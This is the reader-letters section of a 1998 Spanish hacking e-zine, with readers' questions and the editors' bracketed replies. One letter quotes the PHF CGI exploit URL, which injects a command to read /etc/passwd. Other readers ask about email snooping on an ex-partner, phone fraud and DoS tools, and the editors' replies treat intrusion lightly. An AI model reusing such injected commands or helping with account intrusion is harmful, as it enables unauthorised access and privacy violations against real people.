  13007. <────────────────────────────────────────────────────────────────────────────>
  13008.  
  13009.   Date: Thu, 05 Mar 1998 06:41:29 MDT
  13010.   From: martha <m_mondragon@xxxxxxxxxxxxxx>
  13011.   To: conde_vampiro@usa.net
  13012.   Subject: mas informacion 
  13013.  
  13014.   viejito estuve viendo tu pagina y quede trastornado;
  13015.   estuve mirando la informacion de como hackear una web y no entiendo 
  13016.   mucho cuando habla de url y la de 
  13017.   /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 
  13018.   me gustaria mucho que me lo explicaras detalladamente. 
  13019.   pues a penas estoy empezando a explorar este mundo tan increible como es 
  13020.   de los  hackers y te lo prometo que dentro de muy poco tiempo voy a
  13021.   estarles ayudando a contribuir en sus paginas 
  13022.   mi correo es pacoflaco@xxxxxxxxxxxxxx 
  13023.  
  13024.   <------>
  13025.  
  13026.   [ Sinceramente, para que estar aqui escribiendo lineas sobre el PHF, cuando
  13027.     tienes un arti sobre esto en el numero anterior o sea que te aconsejo
  13028.     que te pases por alli y lo leas :)
  13029.     Un URL es cualquier direccion en Inet, como por ejemplo:
  13030.     http://jjfhackers.home.ml.org
  13031.     Okis ? ]
  13032.  
  13033. <────────────────────────────────────────────────────────────────────────────>
  13034.  
  13035.   Date: Thu, 05 Mar 1998 06:11:52 MDT
  13036.   From: martha <m_mondragon@xxxxxxxxxxxxxx>
  13037.   To: conde_vampiro@usa.net
  13038.   Subject: informacion
  13039.  
  13040.   viejito me gustaria informacion que tuviera que ver con hackeadores de
  13041.   password me gusta todo lo relacionado con hack. 
  13042.   mi correo pacoflaco@xxxxxxxxxxxxxx 
  13043.  
  13044.   <------>
  13045.  
  13046.   [ Te remito otra vez al numero anterior :) ]
  13047.  
  13048. <────────────────────────────────────────────────────────────────────────────>
  13049.  
  13050.   Date: Wed, 04 Mar 1998 09:31:18 MDT
  13051.   From: PlaXiuS <plaxius@xxxxxxxxxxxxxx>
  13052.   To: jjf_team@usa.net
  13053.   Subject: Felicitaciones 
  13054.  
  13055.   Bueno Chikos :
  13056.  
  13057.   Dejenme felicitarlos por el pedazo de E-Zine que tienen , a pesar de ser 
  13058.   cortito , la cantidad de informacion y mas bien dicho la calidad es 
  13059.   excelente , e revisado varios E-zine y solo habia encontrado en Raregazz 
  13060.   (http://raregazz.islatortuga.com) un E-Zine valiosa, pero hoy encontre 
  13061.   uno que realmente satisface mis necesidades ... FELICITACIONES y sigan 
  13062.   adelante .. 
  13063.   La verdad habia leido un articulo de Nobody en islatortuga , uno que 
  13064.   encontre excelente , el hack desde 95 . muy burn articulo ... y me llamo 
  13065.   la atencion cuando lo vi por estos lares como colaborador . Bueno seria 
  13066.   interesante que publicaran algunos bugs o exploit para Nt Web , ya que 
  13067.   es este sistema operativo que esta reinante y sera el que a futuro 
  13068.   domine los webs (si es verdad que guindows nt es una mierda ) , pero que 
  13069.   le vamos ha hacer , pro lo menos en mi pais la gran mayoria de los 
  13070.   server trabajan bajo este sistema operativo ... y el famoso getadmin , 
  13071.   esta ampliamente parchado , ademas que solo se puede ejecutar localmente. 
  13072.  
  13073.   Bueno me despido y los vuelvo a felicitar por su E-Zine . 
  13074.  
  13075.   PlaXiuS . 
  13076.  
  13077.   <------>
  13078.  
  13079.   [ Pues thx por tus cumplidos y por supuesto que seguiremos trabajando duro
  13080.     el ezine para que lo podais disfrutar de verdad :)
  13081.     Referente a Nobody que decir... solomante que es uno de nuestros mas
  13082.     leales colaboradores con el ezine. Sobre NT algo tenemos pensado asi
  13083.     que a lo mejor te damos un sorpesa en algun tiempo y sobre los bug's,
  13084.     pues la verdad es que lo hemos pensado pero todavia no estamos seguro
  13085.     debido a nuestro escaso tiempo, por lo que si algun lector se quiere
  13086.     hacer cargo de una seccion de bug's, pues estaria muy bien!!
  13087.     Byes. ]
  13088.  
  13089. <────────────────────────────────────────────────────────────────────────────>
  13090.  
  13091.   Date: Sat, 07 Mar 1998 09:18:17 MDT
  13092.   From: "Fernando Di Bernardo" <fdibernardo@xxxxxxxxxxxxxx>
  13093.   Subject: password en excel 
  13094.  
  13095.   Necesito leer un xls con password, como lo puedo abrir.
  13096.  
  13097.   <------>
  13098.  
  13099.   [ Pasate por nuestro web en la seccion de crack :) ]
  13100.  
  13101. <────────────────────────────────────────────────────────────────────────────>
  13102.  
  13103.   Date: Mon, 09 Mar 1998 13:27:39 MDT
  13104.   From: "Familia Picornell Busquets" <fpicornell@xxxxxxxxxxxxxx>
  13105.   Subject: Buenas, gente! 
  13106.  
  13107.   Hola!!
  13108.   Lo voy a hacer breve:
  13109.   Soy un xico de 15 anyos aficionado a la informatica, i ultimamente me
  13110.   estoy informando sobre todo esto de hackers, crackers, etc.
  13111.  
  13112.   Peroi la verdad es que no pillo nada, o sea primero me respondeis para ver
  13113.   si esta direccion es la adequada i luega hablaremos
  13114.  
  13115.   Hasta luego i gracias!!
  13116.  
  13117.   fpicornell@xxxxxxxxxxxxxx
  13118.  
  13119.   Pere Picornell i Busquets
  13120.  
  13121.   <------>
  13122.  
  13123.   [ Pues parece que esta es la direccion correcta, diria yop ;-) y para pillar
  13124.     algo sobre el tema, pues lee nuestro ezine que para algo esta. ]
  13125.  
  13126. <────────────────────────────────────────────────────────────────────────────>
  13127.  
  13128.   From: "Jose M. Guerrero" <jmguerrero@xxxxxxxxxxxxxx> 
  13129.   Cc: <conde_vampiro@hotmail.com>
  13130.   Subject: Una consulta
  13131.   Date: Tue, 10 Mar 1998 12:24:28 +0100
  13132.  
  13133.   Hola que tal he encontrado tu web en Internet y he visto que eres un hacker
  13134.   y te escribia para pedirte un favor ,te explico conoci una tia por
  13135.   casualidad sin buscarlo por internet de Panama y ha estado jugando con mis
  13136.   sentimientos nada mas y nada menos que casi un año y ahora resulta que se
  13137.   esta riendo de mi e intentando jugar conmigo sipcologicamente y me ha hecho
  13138.   un daño que te cagas y mi pregunta es si sabes si seria posible violar su
  13139.   cuenta de correo electronico o por lo menos saber cuando se conecta.
  13140.   He estado mirando con el programa Finger pero no se si es que no lo se usar
  13141.   bien o que la mayoria de cuentas de correo no lo admiten.
  13142.   Lo unico que tengo de ella por eso es su direccion e-mail y todo lo que pone
  13143.   en las propiedades de algun e-mail suyo.
  13144.  
  13145.   Un saludo de un colega de Manresa Barcelona Spain
  13146.  
  13147.            Home page
  13148.   http://www.freeyellow.com/members/josema
  13149.            E-mail:
  13150.   jmguerrero@xxxxxxxxxxxxxx
  13151.  
  13152.   <------>
  13153.  
  13154.   [ Bueno esto es un tema complejo y ya se sabe que las mujeres dan dolor de
  13155.     cabeza (y que no se enfaden nuestras lectoras ;), logicamente si que
  13156.     puedes violar su correo pero es un delito y esta penado por la
  13157.     justicia y tambien puedes saber cuando se conecta. Si tienes su cuenta
  13158.     de correo autentica es mas facil si es una anonima pues la cosa se
  13159.     complica, ya que si sabes la autentica sabrias su servidor y podrias
  13160.     meter un programa que te avisa cuando se conecta, pero logicamente esto
  13161.     no es nada facil.
  13162.     Sobre el Finger mira el curso de hack IV que viene en este numero, seguro
  13163.     que te sera util ;-) ]
  13164.  
  13165. <────────────────────────────────────────────────────────────────────────────>
  13166.  
  13167.   Date: Wed, 11 Mar 1998 17:28:02 MDT
  13168.   From: Fernando Di Bernardo <fdibernardo@xxxxxxxxxxxxxx>
  13169.   To: "'jjf_team@usa.net'"
  13170.   Subject: Virus Macros, IP 
  13171.  
  13172.   Disculpa si te he tomado como profesor para mi consultas, pero tengo
  13173.   interes en recibir o direcciones de inet, codigo fuente de virus macros
  13174.   para Office, y si es posible con la explicacion de su funcionamiento. 
  13175.  
  13176.   Tambien necesito algun metodo, o programa, para determinar desde que pais, 
  13177.   servidor, y algun dato extra, con la direccion IP, que queda grabada en el
  13178.   log del server. 
  13179.  
  13180.   Gracias 
  13181.  
  13182.   <------>
  13183.  
  13184.   [ Sobre virus pues pasate por nuestra seccion de virus en nuestro web, que
  13185.     seguro que encontaras cosas interesantes.
  13186.     Sobre lo de IP si trabajas con linux no tendras problemas para esto y
  13187.     ademas en el ezine hay diversa informacion de como hacerlo. Por cierto,
  13188.     a quien quieres rastrear ?? }:-) ]
  13189.  
  13190. <────────────────────────────────────────────────────────────────────────────>
  13191.  
  13192.   Date: Sat, 14 Mar 1998 01:45:42 MDT
  13193.   From: Juan Alonso Costas <juanbert@xxxxxxxxxxxxxx>
  13194.   To: jjf_team@usa.net
  13195.   Subject: desde Galicia 
  13196.  
  13197.   Estimado Hacker, estudio ingieneria y estoy recopilando programas de
  13198.   caracter cientifico, enviame si puedes, alguna direcion donde 
  13199.   encontrarlos. 
  13200.  
  13201.   Gracias de ante mano un saludo. 
  13202.  
  13203.   BeRtOnE 
  13204.  
  13205.   <------>
  13206.  
  13207.   [ Y que tenemos que ver nosotros con la distribucion de soft ???
  13208.     y thx por la foto X pero pasamos de sobornos :)
  13209.     Si quieres soft cientifico hay muchos sitios donde pillar solo hay que
  13210.     moverse un poco !!! ]
  13211.  
  13212. <────────────────────────────────────────────────────────────────────────────>
  13213.  
  13214.   Date: Fri, 13 Mar 1998 21:50:51 -0500
  13215.   From: LEONARDO SANCHEZ <al28933@xxxxxxxxxxxxxx> 
  13216.   To: conde_vampiro@hotmail.com
  13217.   Subject: Novato
  13218.  
  13219.   Conde Vampiro, soy nuevo en esto del hacking, por esto necesito toda la
  13220.   informacion posible o algo en lo cual apoyarme.
  13221.  
  13222.   Agradezco cualquier ayuda proporcionada
  13223.  
  13224.   Zeus(hardbody@xxxxxxxxxxxxxx)
  13225.  
  13226.   <------>
  13227.  
  13228.   [ Informacion pues ya sabes lee nuestro ezine y navega por nuestro web, que
  13229.     seguro que pillas muchas cosas ;-) Byes ]
  13230.  
  13231. <────────────────────────────────────────────────────────────────────────────>
  13232.  
  13233.   De: ib309481@xxxxxxxxxxxxxx
  13234.   A: jjf_team@hotmail.com
  13235.   Asunto: J.J.Hackers Team
  13236.   Fecha: lunes 1 de enero de 1990 0:49
  13237.  
  13238.   En primer lugar quiero felicitaros por la revista, porque íes c....!.
  13239.   Tambien a ser posible que hablaseis sobre Linux, porque tengo dudas,  ¿es
  13240.   imprescindible para hackear? y no se si cogerlo.
  13241.   A ser posible quisiera un truco para llamar gratis, o menos dinero......,
  13242.   cosas asi. La cabina a la que me refiero es una cabina digital de
  13243.   Telefonica azul, con posibilidad de tarjeta y de monedas. Y por ultimo,
  13244.   ¿como consigo una cuenta shell?, ni en #Hackers, ni en #Shell, he dado con
  13245.   la respuesta.
  13246.   Saludos a "Conde_Vampiro", que salio en la revista RED, hablando sobre
  13247.   hackers y la revista..........
  13248.  
  13249.   Adios y gracias "XSepHack"
  13250.  
  13251.   <------>
  13252.  
  13253.   [ Bueno pues thx a ti por tus cumplidos y ya veras mas cosas nuestras en la
  13254.     revista EN LA RED ;-), sobre linux lo mas seguro es que demos un curso
  13255.     o sea que problema resuelto y sobre si es necesario para hackear, yo
  13256.     diria que sip ya que muchos servidores utilizan esos s.o., ademas
  13257.     linux te trae muchas herramientas que te seran utiles que los otros
  13258.     s.o. (sistemas operativos) no traen.
  13259.     Lo de phones esta chungo, ya se sabe que timofonica es una jodia, pero
  13260.     ya pillaras algun truco en el ezine y en algunos web's sobre el tema.
  13261.     Lo de shell siempre es dificil al principio ya que sino consigues que
  13262.     alguien te pase una para empezar tendras que hackear una tu. ]
  13263.  
  13264. <────────────────────────────────────────────────────────────────────────────>
  13265.  
  13266.   Date: Sun, 15 Mar 1998 03:12:46 MDT
  13267.   From: "Jose M. Guerrero" <jmguerrero@xxxxxxxxxxxxxx>
  13268.   To: Subject: 
  13269.  
  13270.   Cuando sale el numero 4 de e-zine?
  13271.   Home page 
  13272.   http://www.freeyellow.com/members/josema 
  13273.   E-mail: 
  13274.   jmguerrero@xxxxxxxxxxxxxx 
  13275.  
  13276.   <------>
  13277.  
  13278.   [ Ya lo estas leyendo ;-) ]
  13279.  
  13280. <────────────────────────────────────────────────────────────────────────────>
  13281.  
  13282.   Date: Mon, 16 Mar 1998 20:56:31 MDT
  13283.   From: "Jose M. Guerrero" <jmguerrero@xxxxxxxxxxxxxx>
  13284.   Subject: RE: []
  13285.  
  13286.   Yo fuie quien envio el siguiente e-mail ,pagaria 5000 pst al que me diera
  13287.   la salucion para recivir lo emails que ella recive o envia de esa tia que
  13288.   me jodio tanto o a menos saber cuando esta conectada o dende 
  13289.  
  13290.   Hola que tal he encontrado tu web en Internet y he visto que eres un hacker 
  13291.   y te escribia para pedirte un favor ,te explico conoci una tia por 
  13292.   casualidad sin buscarlo por internet de Panama y ha estado jugando con mis 
  13293.   sentimientos nada mas y nada menos que casi un año y ahora resulta que se 
  13294.   esta riendo de mi e intentando jugar conmigo sipcologicamente y me ha hecho 
  13295.   un daño que te cagas y mi pregunta es si sabes si seria posible violar su 
  13296.   cuenta de correo electronico y ver su correspondencia o por lo menos saber 
  13297.   cuando se conecta. 
  13298.   He estado mirando con el programa Finger y el San Spam pero no se si es 
  13299.   que no lo se usar 
  13300.   bien o que la mayoria de cuentas de correo no lo admiten. 
  13301.   Lo unico que tengo de ella por eso es su direccion e-mail y todo lo que pone 
  13302.   en las propiedades de algun e-mail suyo. 
  13303.   Un saludo de un colega de Manresa Barcelona Spain 
  13304.   Home page 
  13305.   http://www.freeyellow.com/members/josema 
  13306.   E-mail: 
  13307.   jmguerrero@xxxxxxxxxxxxxx 
  13308.  
  13309.   <------>
  13310.  
  13311.   [ Tranquilo !!, ya te hemos dado nuestra contestacion mas arriba ;-) ]
  13312.  
  13313. <────────────────────────────────────────────────────────────────────────────>
  13314.  
  13315.   Date: Wed, 18 Mar 1998 09:47:09 MDT
  13316.   From: <kawa.saki@xxxxxxxxxxxxxx>
  13317.   Subject: Hola 
  13318.  
  13319.   Hola,
  13320.   Soy un poco Newbie, donde y como empiezo, que leo, etc, 
  13321.   Dany, 
  13322.   Gracias por adelantado 
  13323.  
  13324.   CodeBracker en IRC
  13325.  
  13326.   <------>
  13327.  
  13328.   [ Pues logicamnete este ezine, que seguro que te sera de gran ayuda, aunque
  13329.     por descontado, pasate por nuestro web. ]
  13330.  
  13331. <────────────────────────────────────────────────────────────────────────────>
  13332.  
  13333.   Subject: joder
  13334.   To: jjf_team@hotmail.com
  13335.   Date: Mon, 23 Mar 1998 10:40:46 MET
  13336.   From: 444525@xxxxxxxxxxxxxx 
  13337.  
  13338.   soy yo oooootra vez..rrush
  13339.   ke se me olvidaba una kosilla.Ke si sabeis alguna otra forma de entrar
  13340.   debido a la mala konfiguaricon del ftp.
  13341.   vale?
  13342.   pos adiox y thx 
  13343.  
  13344.   <------>
  13345.  
  13346.   [ Curioso, la verdad, ya te respondimos en el numero 3, pero por lo visto
  13347.     no lo has leido. Te diremos lo mismo que antes, has intentado usar el
  13348.     Kermit ?, tambien puedes enviarte un mail a esa cuenta con el fichero
  13349.     adjunto y ya esta. En realidad es muy simple :)
  13350.     Por cierto, hemos cambiado de Buzon!!!!! ]
  13351.  
  13352. <────────────────────────────────────────────────────────────────────────────>
  13353.  
  13354.   Date: Thu, 26 Mar 1998 16:40:19 MDT
  13355.   From: martha <m_mondragon@xxxxxxxxxxxxxx>
  13356.   To: conde_vampiro@usa.net
  13357.   Subject: sangre 
  13358.  
  13359.  
  13360.   <------>
  13361.  
  13362.   [ Y esto ???? un mail vacio, como estamos!! ]
  13363.  
  13364. <────────────────────────────────────────────────────────────────────────────>
  13365.  
  13366.   From: "Familia Picornell Busquets" <fpicornell@xxxxxxxxxxxxxx> 
  13367.   To: <jjf_team@hotmail.com> 
  13368.   Subject: Ayuda, por favor! 
  13369.   Date: Tue, 24 Mar 1998 02:32:42 +0100 
  13370.  
  13371.   Hola, gente! 
  13372.   Soy un newbie que necesito ayuda para poder hacer algo, para aprender, 
  13373.   ya que todo lo que encuentro son: o Hackers que no comparten sus  
  13374.   conocimientos, o documentos ilegibles, o con tecnicismos que no  
  13375.   pillo, etc... 
  13376.  
  13377.   A ver si podeis perder un poco de tiempo indicandome donde puedo ir, 
  13378.   con quien puedo hablar, o mandarme algun arxivo (podeis confiar  
  13379.   conmigo, por favor no me puteeis como ya me han hecho algunas veces. yo 
  13380.   confio en vosotros, al menos...) 
  13381.  
  13382.   Os agradeceria muchisimo vuestra ayuda.
  13383.   Por cierto, puede que la direccion no funcione, entonces responded 
  13384.   directamente al missage i quiza funcione 
  13385.  
  13386.   fpicornell@xxxxxxxxxxxxxx 
  13387.  
  13388.   Gracias! 
  13389.  
  13390.   the Sardaukar 
  13391.   
  13392.   <------>
  13393.  
  13394.   [ Nosotros respondemos por aqui :) y si lo que buscas es info, pues lee
  13395.     este ezine que esta creado para que os podais meter en el mundo
  13396.     underground sin ningun problema, ya que todo esta bien explicado o eso
  13397.     pensamos, lo de enviar ficheros y hablar con gente en eso no podemos
  13398.     ayudarte, siempre te puedes poner en contacto con los autores de los
  13399.     articulos y que conste que nosotros no puteamos a nadie ;-) ]
  13400.  
  13401. <────────────────────────────────────────────────────────────────────────────>
  13402.  
  13403.   Date: Tue, 31 Mar 1998 20:46:29 MDT
  13404.   From: Victor Pena Huerta <vphuerta@xxxxxxxxxxxxxx>
  13405.   To: jjf_team@usa.net
  13406.   Subject: hola 
  13407.  
  13408.   me gustaria ser hacker me podrian ensellar mi nick es ssayan3
  13409.  
  13410.   <------>
  13411.  
  13412.   [ Hombre, no vamos dando clases privadas, como comprenderas, pero para eso
  13413.     esta nuestro/vuestro ezine :), para que podais aprender el arte del
  13414.     hacking, pero en realidad el hacking es la curiosidad y ganas de
  13415.     aprender. ]
  13416.  
  13417. <────────────────────────────────────────────────────────────────────────────>
  13418.  
  13419.   From: "Alberto Castro" <albertocr@xxxxxxxxxxxxxx> 
  13420.   To: jjf_team@hotmail.com
  13421.   Subject: cuenta shell
  13422.   Date: Sun, 29 Mar 1998 18:45:31 PST
  13423.  
  13424.   Hola muchachos, soy nuevo en este mundo,
  13425.   Me parece muy interesante su revista, sigan adelante.
  13426.  
  13427.   Me gustaria tener la cuenta shell en:
  13428.   http://www2.seeder.net.tw/tpm/
  13429.  
  13430.   Gracais por todo.
  13431.  
  13432.                           Dragonfly
  13433.  
  13434.   <------>
  13435.  
  13436.   [ Pues thx por tus cumplidos y claro que seguiremos en esta linea o incluso
  13437.     superarnos ;-)
  13438.     Pero no entendemos que quieres decir con lo de la cuenta shell ??, hemos
  13439.     visto que todo esta en Chino. Acaso entiendes chino ?? ]
  13440.  
  13441. <────────────────────────────────────────────────────────────────────────────>
  13442.  
  13443.   Date: Tue, 31 Mar 1998 23:52:20 MDT
  13444.   From: plaxius <plaxius.com@xxxxxxxxxxxxxx>
  13445.   To: jjf_team@usa.net
  13446.   Subject: muy guena 
  13447.  
  13448.   Holap chikos ..
  13449.  
  13450.   Un gusto escribirles de nuevo ... solo escribo para decirles que la 
  13451.   pagina esta muy buena esta chulisima .. en especial el applet ... a todo 
  13452.   esto tengo una pagina con este applet asi que espero que no piensen que 
  13453.   les ando copiando el formato jejej .,,.. okis nos vemos pronto les envio 
  13454.   informacion para presentarles un nuevo E-Zine made in chile .. llamado 
  13455.   Proyecto_R en el cual trataremos de abordar algunos temas no tan 
  13456.   manoseados ... ademas pronto les enviare info sobre el Komando A.P.I. 
  13457.   komando Anti Pornografia Infantil , somos un grupo de wannabes y 
  13458.   hackers luchando en contra de la pornografia infantil en su mayoria 
  13459.   latinoamericanos , grupo al kual pertenece katiuska la creadora del 
  13460.   famoso Viruz en contra de la pornografia infantil . 
  13461.  
  13462.   Nos Belmont Chikoss 
  13463.  
  13464.   Un Afectuoso Saludo de 
  13465.  
  13466.   PlaXiuS 
  13467.   irc dalnet canal #chile 
  13468.   http://www.geocities.com/soho/lofts/5372 
  13469.  
  13470.   <------>
  13471.  
  13472.   [ El web es todo trabajo de Mac Crack (la verdad es que se lo curra ;)
  13473.     Lo del ezine nos parece muy bien y ya nos avisaras cuando este el
  13474.     primer numero :) y tb estamos deseosos de saber sobre lo de A.P.I.
  13475.     ya que nosotros estamos en contra de la pornografia infantil!!!
  13476.     Suerte con vuestros proyectos ;-)) ]
  13477.  
  13478. <────────────────────────────────────────────────────────────────────────────>
  13479.  
  13480.   Date: Thu, 02 Apr 1998 05:17:43 +0000
  13481.   From: astruc@xxxxxxxxxxxxxx  
  13482.   Subject: Felicidades
  13483.   To: jjf_team@hotmail.com
  13484.  
  13485.   Felicidades por vuestro ezine. Con vuestro permiso, incluiremos
  13486.   un link en nuestra pagina.
  13487.   Saludos.
  13488.  
  13489.   astruc@smileyface.com
  13490.   http://www.olivet.com/astruc
  13491.  
  13492.   <------>
  13493.  
  13494.   [ Thx y claro, no problemo!! ;-) ]
  13495.  
  13496. <────────────────────────────────────────────────────────────────────────────>
  13497.  
  13498.   From zyklon@galaxycorp.com Mon Apr 13 08:33:07 1998
  13499.   To: jjf_team@hotmail.com
  13500.   From: zyklon <zyklon@xxxxxxxxxxxxxx>  
  13501.   Subject: e-zine
  13502.  
  13503.   El e-zine eesta bastante bien.Os queria comentar si teneis intenciones
  13504.   de escribir sobre ip-spoofing,dada la poca info ke hay sobre el tema
  13505.   en español programas ke hay,ejemplos de como suplantar otra ip etc...si
  13506.   no,si sabeis algo del tema o teneis algun ficherillo,os agradeceria me lo
  13507.   mandaseis para investigarlo
  13508.   ....y asi poder ser un futuro articulo en el e-zine.....
  13509.         
  13510.              ........al diablo siempre tiene 
  13511.                                 trabajo para las manos 
  13512.                                 que no hacen nada..........
  13513.  
  13514.   <------>
  13515.  
  13516.   [ El tema del IP-Spoofing ya fue tratado en este ezine en el 2 numero, pero
  13517.     no descartamos la idea de seguir con el tema :), lo de enviar ficheros
  13518.     no puede ser, en todo caso pasate por nuestro web.
  13519.     Esperamos tu articulo ;-) ]
  13520.  
  13521. <────────────────────────────────────────────────────────────────────────────>
  13522.  
  13523.   Date: Wed, 15 Apr 1998 01:13:35 GMT
  13524.   From: "Ottmar Figueroa R." <fottmar@xxxxxxxxxxxxxx>
  13525.   To: conde_vampiro@usa.net
  13526.   Subject: saludos 
  13527.  
  13528.   Holas.
  13529.  
  13530.   Queria preguntarte, que de cierto tiene el asunto del virus de Access y de 
  13531.   ser cierto, si Uds. tienen como disponer del codigo o una copia del virus 
  13532.   (para efectos educativos). 
  13533.  
  13534.   Gracias. 
  13535.   racias. 
  13536.  
  13537.   <------>
  13538.  
  13539.   [ En nuestra seccion de Virus en el web, seguro que encontaras cosas que
  13540.     te seran util. Si que existen virus de Access pero nosotros no disponenos
  13541.     del codigo fuente por el momento, por lo que si alguien lo tiene que nos
  13542.     lo envie y lo colgaremos en el web :) ]
  13543.  
  13544. <────────────────────────────────────────────────────────────────────────────>
  13545.  
  13546.   Date: Thu, 16 Apr 1998 17:50:55 GMT
  13547.   From: Luis Alfonso Alvarez Sestelo <geyper@xxxxxxxxxxxxxx>
  13548.   To: conde_vampiro@usa.net
  13549.  
  13550.   Hola, te escribo para decirte que estais haciendo un gran labor con 
  13551.   vuestra revista. Creo que de todas las espanholas es la que mas ayuda a la 
  13552.   gente novel en este campo. Me gustaria que me dijeses si existe la 
  13553.   posibilidad de que fueses mi "mentor". Soy una persona a la que le gusta 
  13554.   aprender y creo que lo hago bastante rapido pero hay cosas que se me 
  13555.   resiste. Espero que no pienses que quiero tomarte el pelo o que soy de la 
  13556.   poli o algo asi. Estoy dispuesto a contestarte a cualquier pregunta que 
  13557.   desees hacerme y en caso de que no puedas o no quieras hacerlo, sin 
  13558.   problema 
  13559.   Saludos 
  13560.  
  13561.   geyper:) 
  13562.  
  13563.   <------>
  13564.  
  13565.   [ Pues thx pero por desgracia no podemos ayudarte, si lo que quieres es
  13566.     aprender lee nuestro ezine y demas documentos nuestros e intenta
  13567.     escribir algun articulo para ir cogiendo soltura. Nuestro consejo es que
  13568.     leas todo lo que puedas y hagas tus propios experimentos pero siempre
  13569.     con cuidado de lo que haces. ]
  13570.  
  13571. <────────────────────────────────────────────────────────────────────────────>
  13572.  
  13573.   Date: Mon, 20 Apr 1998 20:44:01 GMT
  13574.   From: ferran picornell <fpicornell@xxxxxxxxxxxxxx>
  13575.   To: conde_vampiro@usa.net
  13576.   Subject: Traduccion
  13577.  
  13578.   Plφ... kalguien me traduzca el texto de iniciacion al phreaking. I si te 
  13579.   viene bien, me mandas los que tengas traducidos. :-) 
  13580.   Grcias, y astalavista! 
  13581.   -Sardaukar 
  13582.  
  13583.   daukar 
  13584.  
  13585.   <------>
  13586.  
  13587.   [ Nosotros por el momento no podemos pero si algun lector le interesa, pues
  13588.     que lo traduzca y nos lo envie al ezine :), lo referente a ya traduciodos
  13589.     nosotros no hemos visto nada al respecto. ]
  13590.  
  13591. <────────────────────────────────────────────────────────────────────────────>
  13592.  
  13593.   Date: Tue, 21 Apr 1998 23:03:37 GMT
  13594.   From: <JIBINARRIAGAD@xxxxxxxxxxxxxx>
  13595.   Subject: Un novato lector tuyo 
  13596.  
  13597.   Hola tio, soy un chaval de 17 años que acaba de empezar a leer cosas sobre
  13598.   el hacking. Encontre vuestro E-zine en un pagina y os ponian muy bien asi
  13599.   que me lo baje. He de decirte que es muy bueno y me ha gustado mucho, ya
  13600.   que no es muy complicado.
  13601.   Te escribo porque me gustaria que fueras mi profesor :-) acerca sobre el
  13602.   hacking porque a pesar que todos los hackers decis que es muy facil no lo
  13603.   es tanto aunque si mas de lo que parece. Como he dicho soy un novato tanto
  13604.   en esto del hacking como de la Red como de los ordenadores, pero no te
  13605.   desesperes ya que a E-zines como la tuya o Saqueadores (muy buena y muy
  13606.   facil de entender) he aprendido bastante sobre la Red que no viene en
  13607.   revistas del mundo de la informatica como Pc-actual.
  13608.   Pues lo dicho te agradeceria mucho tu ayuda porque de verdad me gusta y
  13609.   tengo ganas de aprender porque ademas esto no te enseñan en la carrera,
  13610.   pero si no quieres o estis muy ocupado, tranquilo lo comprendere :-),
  13611.   supongo que te habran escrito muchos como yo. :-D
  13612.   Mi direccion es: jibinarriagad@xxxxxxxxxxxxxx
  13613.   Muchas gracias por tu atencion
  13614.   Jaime
  13615.  
  13616.   <------>
  13617.  
  13618.   [ Thx pero no podemos ayudarte, ya que como hemos dicho antes no vamos
  13619.     dando clases privadas, pero para eso teneis nuestro/vuestro ezine, en el
  13620.     cual plasmamos nuestros conocimientos :) para que podais aprender el
  13621.     significado real del hacking, que siemplemente es la curiosidad y las
  13622.     ganas de aprender. Decirte tb que el hacking no es facil por mucho que
  13623.     digan. ]
  13624.  
  13625. <────────────────────────────────────────────────────────────────────────────>
  13626.  
  13627.   Date: Wed, 22 Apr 1998 05:33:28 GMT
  13628.   From: stain@xxxxxxxxxxxxxx
  13629.   To: jjf_team@usa.net
  13630.   Subject: felicitaciones a Nobody x el doc de hackig en Win 95 y mas... 
  13631.  
  13632.   Amigos del JJF Hackers Team, les escribo de paso para decirles que la
  13633.   revista me parece excelente. No veo la hora que salga la proxima. Sigan
  13634.   asi, con mucho empuje. 
  13635.  
  13636.   El motivo de mi mail era para el señor Nobody (me dirijo a el a traves de 
  13637.   ustedes porque no tengo su e-mail). Queria felicitarlo por el magnifico
  13638.   trabajo que hizo en el documento "La superquia del Hacker". Hacia falta que
  13639.   alguien escribiera sobre como hackear al/desde Windoze 95 (por mas que
  13640.   todos sigamos prefiriendo el Unix porque es lo mejor que hay y porque....
  13641.   buehhh, ya saben el resto).
  13642.   En mi humilde opinion, a este sistema operativo se lo deberia seguir 
  13643.   investigando para encontrarle fallas (que tiene da a millones) y ver como 
  13644.   hackearlo y como hackear desde el, o como hundirlo :)á Esto lo digo porque
  13645.   no se donde lei que el uso del Windoze NT estaba creciendo a pasos
  13646.   agigantados y en el futuro Unix se iria dejado de usar; para lamento de
  13647.   todos nosotros.
  13648.   En segundo lugar, hackear Unix es como cosa conocida, hay bugs, exploits, 
  13649.   nukes, backdoors, sniffers y cientos de cosas mas de a montones y por
  13650.   doquier.
  13651.   Pero que hay con Win 95.NT? Poco y nada. Es por esto que seria de mucho
  13652.   agrado para los que usan Win 95/NT como alternativa que Nobody (porque fue
  13653.   el primero) o alguien del JJF-HT escribiera una segunda guia para hackear
  13654.   desde Windows 95 mas avanzada y tecnica, detallando mas tecnicas, metodos y
  13655.   programas que hay (alguien dijo IP spoffing en Win 95????). 
  13656.   Otra cosa: ustedes bien saben que hay muchos ataques del tipo Unix to 
  13657.   Windows: land, sync flood, bonk, winnuke, boink, teardrop y semejantes. Se 
  13658.   podria hacer todo esto Windows to Windows? A mi me gustan los desafios, y a 
  13659.   ustedes? No seria bueno que ALGUIEN (ohhh quien sera ese benevolo ser?)
  13660.   hiciera un programejo con todos estos ataques DoS (agregandole quiza mas
  13661.   utilidades como mailbomer, mail anonimo y etc..) en castellano, de paso? 
  13662.   Por que? se preguntaran. Imaginen la siguiente situacion: estan usando Word
  13663.   o Excel (Win 95) y se acordaron que quieren jugarle una bromita (pequeña) a
  13664.   un amigo. En vez de... guardar todo, cerrar el programa, rebotear, comenzar
  13665.   Linux, esperar a que cargue, utilizar los ataques DoS o similares contra
  13666.   esa persona, salir de Linux, rebootear, iniciar Win 95, esperar a que
  13667.   cargue, abrir Word o Excel y continuar trabajando... no seria mas facil
  13668.   ejecutar ese superprogramejo cagaWindoze cien veces mas potente que el
  13669.   comun Winnuke, en espanol; mandarle el tipo de ataque que querramos
  13670.   (pudiendo ser casi anonimos porque el programa utilizaria varios servers y
  13671.   proxies) mientras continuamos con nuestra sesion de Wor o Excel? No seria
  13672.   mas facil?
  13673.   Ideas? tengo muchas, posibilidades? pocas porque lamentablemente ya estoy 
  13674.   viejo para aprender a programar en Windoze. 
  13675.  
  13676.   Desde ya muchisimas gracias por su tiempo y paciencia, espero que me puedan 
  13677.   ayudar (o que Nobody haga algo) 
  13678.  
  13679.   STAIN 
  13680.  
